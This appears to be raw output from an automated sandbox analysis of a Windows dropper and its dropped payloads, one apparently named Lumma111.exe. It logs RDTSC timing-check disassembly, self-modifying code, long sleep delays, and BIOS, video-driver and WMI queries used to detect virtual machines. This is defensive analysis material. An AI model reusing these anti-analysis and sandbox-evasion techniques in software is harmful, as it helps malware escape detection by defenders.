Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380143 second address: 53801E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE492D962CAh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FE4211E2AC4h 0x00000016 jmp 00007FE4211E2AC5h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FE4211E2AC0h 0x00000022 jmp 00007FE4211E2AC5h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ecx, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FE4211E2AC3h 0x00000034 adc ecx, 51F4A6EEh 0x0000003a jmp 00007FE4211E2AC9h 0x0000003f popfd 0x00000040 mov ch, 72h 0x00000042 popad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801E8 second address: 53801EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801EE second address: 53801F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53801F2 second address: 538020B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE420CEA00Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538020B second address: 538023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE4211E2AC1h 0x00000009 add esi, 1FBA8886h 0x0000000f jmp 00007FE4211E2AC1h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538023A second address: 5380287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and ecx, 1Fh 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e push eax 0x0000000f pop esi 0x00000010 popad 0x00000011 ror eax, cl 0x00000013 pushad 0x00000014 mov ecx, ebx 0x00000016 pushfd 0x00000017 jmp 00007FE420CEA019h 0x0000001c sbb al, 00000046h 0x0000001f jmp 00007FE420CEA011h 0x00000024 popfd 0x00000025 popad 0x00000026 leave 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380287 second address: 538028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538028B second address: 538029E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 538029E second address: 53802DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00A32014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007FE425B72CA2h 0x00000026 push FFFFFFFEh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FE4211E2AC8h 0x00000031 or ch, 00000078h 0x00000034 jmp 00007FE4211E2ABBh 0x00000039 popfd 0x0000003a mov si, 14AFh 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53802DE second address: 5380396 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA015h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b movzx eax, bx 0x0000000e pushfd 0x0000000f jmp 00007FE420CEA019h 0x00000014 and cx, D776h 0x00000019 jmp 00007FE420CEA011h 0x0000001e popfd 0x0000001f popad 0x00000020 ret 0x00000021 nop 0x00000022 push eax 0x00000023 call 00007FE42567A26Eh 0x00000028 mov edi, edi 0x0000002a pushad 0x0000002b push esi 0x0000002c pushfd 0x0000002d jmp 00007FE420CEA013h 0x00000032 add si, 9CAEh 0x00000037 jmp 00007FE420CEA019h 0x0000003c popfd 0x0000003d pop eax 0x0000003e call 00007FE420CEA011h 0x00000043 mov ecx, 3A000227h 0x00000048 pop eax 0x00000049 popad 0x0000004a push esp 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FE420CEA012h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5380396 second address: 53803A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803A5 second address: 53803BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE420CEA014h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803BD second address: 53803C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803C1 second address: 53803EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FE420CEA017h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53803EA second address: 5380419 instructions: 0x00000000 rdtsc 0x00000002 mov si, 2BC7h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE4211E2ABCh 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4211E2AC7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330040 second address: 5330044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330044 second address: 5330059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330059 second address: 5330073 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330073 second address: 5330090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov edx, 019E915Ch 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE4211E2ABDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330090 second address: 5330094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330094 second address: 533009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533009A second address: 5330110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE420CEA00Ah 0x00000009 sub cl, FFFFFFA8h 0x0000000c jmp 00007FE420CEA00Bh 0x00000011 popfd 0x00000012 mov ecx, 4359B89Fh 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c jmp 00007FE420CEA012h 0x00000021 and esp, FFFFFFF8h 0x00000024 pushad 0x00000025 mov esi, 713104DDh 0x0000002a mov di, si 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FE420CEA011h 0x00000038 add cx, BF26h 0x0000003d jmp 00007FE420CEA011h 0x00000042 popfd 0x00000043 push ecx 0x00000044 pop edi 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330110 second address: 533012C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE4211E2AC8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533012C second address: 5330130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330130 second address: 533014E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FE4211E2ABEh 0x0000000e xchg eax, ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533014E second address: 5330152 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330152 second address: 5330158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330158 second address: 53301A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FE420CEA010h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007FE420CEA017h 0x00000017 mov si, A3DFh 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov bh, cl 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301A4 second address: 53301C8 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE4211E2AC7h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301C8 second address: 53301D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301D8 second address: 53301F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 mov edi, 323B3DA2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301F5 second address: 53301FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53301FB second address: 5330223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FE4211E2ABEh 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FE4211E2ABEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330223 second address: 5330228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330228 second address: 533027F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE4211E2AC7h 0x0000000a jmp 00007FE4211E2AC3h 0x0000000f popfd 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 xchg eax, esi 0x00000014 jmp 00007FE4211E2AC6h 0x00000019 mov esi, dword ptr [ebp+08h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx edi, ax 0x00000022 movzx ecx, bx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533027F second address: 53302F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE420CEA00Eh 0x00000009 sub ax, 9888h 0x0000000e jmp 00007FE420CEA00Bh 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b pushad 0x0000001c call 00007FE420CEA010h 0x00000021 pushfd 0x00000022 jmp 00007FE420CEA012h 0x00000027 add ah, 00000018h 0x0000002a jmp 00007FE420CEA00Bh 0x0000002f popfd 0x00000030 pop esi 0x00000031 mov ax, dx 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE420CEA00Ch 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302F2 second address: 53302F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302F6 second address: 53302FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53302FC second address: 5330372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2ABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FE4211E2AC0h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FE4211E2ABEh 0x00000018 and ax, 4208h 0x0000001d jmp 00007FE4211E2ABBh 0x00000022 popfd 0x00000023 push ecx 0x00000024 pop eax 0x00000025 popad 0x00000026 je 00007FE492DE0D86h 0x0000002c jmp 00007FE4211E2AC1h 0x00000031 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FE4211E2ABDh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330372 second address: 5330406 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA011h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE4928E82AAh 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 jmp 00007FE420CEA019h 0x00000018 popad 0x00000019 mov edx, dword ptr [esi+44h] 0x0000001c jmp 00007FE420CEA00Eh 0x00000021 or edx, dword ptr [ebp+0Ch] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FE420CEA00Dh 0x0000002d or cl, 00000046h 0x00000030 jmp 00007FE420CEA011h 0x00000035 popfd 0x00000036 pushfd 0x00000037 jmp 00007FE420CEA010h 0x0000003c add ah, FFFFFFE8h 0x0000003f jmp 00007FE420CEA00Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330406 second address: 53304B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4211E2AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f jmp 00007FE4211E2ABEh 0x00000014 jne 00007FE492DE0D07h 0x0000001a pushad 0x0000001b jmp 00007FE4211E2ABEh 0x00000020 pushfd 0x00000021 jmp 00007FE4211E2AC2h 0x00000026 adc si, 05D8h 0x0000002b jmp 00007FE4211E2ABBh 0x00000030 popfd 0x00000031 popad 0x00000032 test byte ptr [esi+48h], 00000001h 0x00000036 jmp 00007FE4211E2AC6h 0x0000003b jne 00007FE492DE0CCCh 0x00000041 jmp 00007FE4211E2AC0h 0x00000046 test bl, 00000007h 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FE4211E2ABAh 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53304B2 second address: 53304C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207F5 second address: 5320855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, di 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FE4211E2AC6h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ax, D2BDh 0x00000015 movzx ecx, dx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE4211E2AC5h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FE4211E2AC8h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320855 second address: 5320864 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE420CEA00Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320864 second address: 53208B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 3ACAh 0x00000007 pushfd 0x00000008 jmp 00007FE4211E2ABBh 0x0000000d xor esi, 6312E56Eh 0x00000013 jmp 00007FE4211E2AC9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FE4211E2ABEh 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ebx, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53208B1 second address: 53208B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A3E714 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BE152B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A3E6FB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: C63A9E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10E714 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2B152B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10E6FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 333A9E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: ED48C4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: 10A3D3B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Special instruction interceptor: First address: 1106AE5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 3DBDEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 5B5FC8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 59BC57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 3DBD39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Special instruction interceptor: First address: 610C82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 7CB9C9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 97464B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: 9804FA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Special instruction interceptor: First address: A03CDE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 5456CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 39D4F6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 39F971 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Special instruction interceptor: First address: 5DDC42 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Special instruction interceptor: First address: B1DCAA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Special instruction interceptor: First address: B1DC37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 52E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 5450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Memory allocated: 7450000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053A0E2D rdtsc 0_2_053A0E2D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1013
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1778
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1105
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1102
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 383
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7704 Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep count: 860 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7688 Thread sleep time: -1720860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep count: 1013 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7684 Thread sleep time: -2027013s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 1778 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -3557778s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep count: 1105 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7692 Thread sleep time: -2211105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656 Thread sleep count: 290 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7656 Thread sleep time: -8700000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep count: 1102 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7676 Thread sleep time: -2205102s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep count: 383 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7680 Thread sleep time: -766383s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7936 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7936 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7944 Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7944 Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7960 Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7960 Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7932 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe TID: 7940 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe TID: 6568 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe TID: 6692 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 6020 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 3704 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 1136 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 4868 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 1376 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe TID: 3448 Thread sleep time: -150000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
